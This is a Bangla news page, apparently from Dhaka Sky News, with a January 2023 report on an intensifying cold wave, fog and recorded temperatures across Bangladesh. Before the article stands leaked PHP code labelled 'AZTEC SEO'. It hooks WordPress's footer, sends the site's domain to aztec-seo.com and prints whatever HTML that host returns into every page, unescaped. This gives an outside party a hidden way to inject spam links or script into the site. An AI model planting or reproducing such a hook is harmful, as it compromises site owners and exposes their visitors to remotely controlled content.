/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); শীতের তীব্রতা আরও বাড়তে পারে | Dhaka Sky News

কিশোরগঞ্জের পাগলা মসজিদের দানবাক্সে ২০ বস্তায় ৪ কোটি টাকারও বেশি মিলল

আগের সংবাদ

পটুয়াখালীতে প্রধানমন্ত্রীর ত্রাণ তহবিলের ১৬ লাখ টাকা অনুদান পেলেন ৩২ নারী-পুরুষ

পরের সংবাদ

শীতের তীব্রতা আরও বাড়তে পারে

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: January 7, 2023 , 5:20 pm

সারাদেশে শীত আরও বাড়তে পারে। দিন ও রাতে তাপমাত্রা সামান্য বাড়তে পারে। তাপমাত্রা কমে যাওয়ায় মাঝারি থেকে তীব্র শৈত্যপ্রবাহ বাড়তে পারে। শনিবার সকালে আবহাওয়ার পূর্বাভাসে এ কথা বলা হয়।

আবহাওয়ার পূর্বাভাসে বলা হয়, ফরিদপুর, মাদারীপুর, কিশোরগঞ্জ, দিনাজপুর, নীলফামারী, পঞ্চগড়, যশোর, চুয়াডাঙ্গা, কুষ্টিয়া, সাতক্ষীরা ও বরিশাল জেলাসহ রাজশাহী বিভাগের ওপর দিয়ে মৃদু শৈত্যপ্রবাহ বয়ে যাচ্ছে।

শনিবার মধ্যরাত থেকে সকাল পর্যন্ত মাঝারী থেকে ঘন কুয়াশা পড়তে পারে এবং এটি দেশের কোথাও কোথাও দুপুর পর্যন্ত অব্যাহত থাকতে পারে।

শনিবার সর্বোচ্চ তাপমাত্রা রেকর্ড করা হয়েছে টেকনাফে ২৬ দশমিক ৭ ডিগ্রি সেলসিনয়াস এবং সর্বনিম্ন তাপমাত্রা রেকর্ড করা হয়েছে চুয়াডাঙ্গায় ৮ দশমিক ৪ ডিগ্রি সেলসিয়াস।

উপমহাদেশীয় উচ্চচাপ বলয়ের বাড়তি অংশ পশ্চিমবঙ্গ ও এর কাছাকাছি এলাকায় অবস্তান করছে। মৌসুমের স্বাভাবিক লঘুচাপ দক্ষিণ বঙ্গোপসাগরে অবস্থান করছে। এর বাড়তি অংশ উত্তর বঙ্গোপসাগর পর্যন্ত বিস্তৃত রয়েছে।

শনিবার সূর্যাস্ত সন্ধ্যা ৫টা ২৬ মিনিটে এবং আগামীকাল সূর্যোদয় ভোর ৬টা ৪৩ মিনিটে। শৈত্যপ্রবাহ বাড়ার কারণে দেশের বেশ কয়েকটি জেলার মানুষ অসহনীয় দুর্ভোগ পোহাচ্ছে।